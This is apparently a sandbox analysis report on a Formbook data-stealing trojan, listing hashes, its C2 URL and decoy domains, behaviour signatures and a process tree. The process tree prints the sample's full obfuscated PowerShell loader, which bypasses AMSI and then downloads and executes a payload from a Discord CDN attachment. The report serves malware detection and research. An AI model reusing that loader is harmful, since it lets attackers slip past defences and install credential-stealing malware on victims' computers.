Overview

overview

10

Static

static

06daa4f472...76.exe

windows7_x64

10

06daa4f472...76.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    142s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-07-2021 18:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    06daa4f472383226392964c70e34c376.exe

  • Size

    65KB

  • MD5

    06daa4f472383226392964c70e34c376

  • SHA1

    b47a3554b0bf7250caa0f84090fb387cb332f31b

  • SHA256

    51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541

  • SHA512

    9f220bc3f4c097d582f2958e57255e862f1b67191c6409ea0199a1c9ce3bd57830f7d9cd86c38925b7c61d744a77cbd51d2b59ffee9f66d57e0ee2a4ab654dee

Score
10/10
formbookratspywarestealersuricatatrojan

Malware Config

Extracted

Family

formbook

Version

4.1

C2

http://www.howmucharemyrarecoinsworth.com/jn7g/

Decoy

mojketering.com

signinsimple.com

theartclouds.com

xmartmanagement.com

akademisantri.com

knitsu.com

funeralhomeswarrensburgil.com

formatohd.xyz

ortetiles.com

myeduhubs.com

twinpiques.com

itpaystobefashionable.com

3drinkminimum.com

wanpoo1.com

crystalclearlifecoachingcc.com

dronerealestate.net

langers.email

konstela.com

enteratecondanielvelasquez.com

graceinhomeschoolchaos.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • suricata: ET MALWARE FormBook CnC Checkin (GET)
    suricata
  • Formbook Payload 3 IoCs
    rat
  • Blocklisted process makes network request 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:2756
    • C:\Users\Admin\AppData\Local\Temp\06daa4f472383226392964c70e34c376.exe
      "C:\Users\Admin\AppData\Local\Temp\06daa4f472383226392964c70e34c376.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3236
      • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
        Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$76545677866555677886556778657=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,56,49,51,54,56,53,52,48,48,51,55,50,50,47,109,101,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($76545677866555677886556778657)|I`E`X
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2128
        • C:\WINDOWS\syswow64\calc.exe
          "{path}"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:992
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2320
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\WINDOWS\syswow64\calc.exe"
        3⤵
          PID:2928

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/992-162-0x0000000000400000-0x000000000042E000-memory.dmp
      Filesize

      184KB

      Download
    • memory/992-168-0x0000000000550000-0x0000000000564000-memory.dmp
      Filesize

      80KB

      Download
    • memory/992-167-0x0000000002A90000-0x0000000002DB0000-memory.dmp
      Filesize

      3.1MB

      Download
    • memory/992-163-0x000000000041EBD0-mapping.dmp
      Download
    • memory/2128-144-0x0000024FC87F6000-0x0000024FC87F8000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2128-119-0x0000024FC87F0000-0x0000024FC87F2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2128-159-0x0000024FC99E0000-0x0000024FC9A3A000-memory.dmp
      Filesize

      360KB

      Download
    • memory/2128-125-0x0000024FC9490000-0x0000024FC9491000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2128-121-0x0000024FC8940000-0x0000024FC8941000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2128-166-0x0000024FC87F8000-0x0000024FC87F9000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2128-120-0x0000024FC87F3000-0x0000024FC87F5000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2128-114-0x0000000000000000-mapping.dmp
      Download
    • memory/2320-171-0x0000000000000000-mapping.dmp
      Download
    • memory/2320-174-0x00000000001D0000-0x00000000001FE000-memory.dmp
      Filesize

      184KB

      Download
    • memory/2320-173-0x0000000000CD0000-0x0000000000D29000-memory.dmp
      Filesize

      356KB

      Download
    • memory/2320-175-0x0000000002ED0000-0x00000000031F0000-memory.dmp
      Filesize

      3.1MB

      Download
    • memory/2320-176-0x0000000000BB0000-0x0000000000C43000-memory.dmp
      Filesize

      588KB

      Download
    • memory/2756-169-0x0000000004C50000-0x0000000004D89000-memory.dmp
      Filesize

      1.2MB

      Download
    • memory/2756-177-0x0000000004D90000-0x0000000004E96000-memory.dmp
      Filesize

      1.0MB

      Download
    • memory/2928-172-0x0000000000000000-mapping.dmp
      Download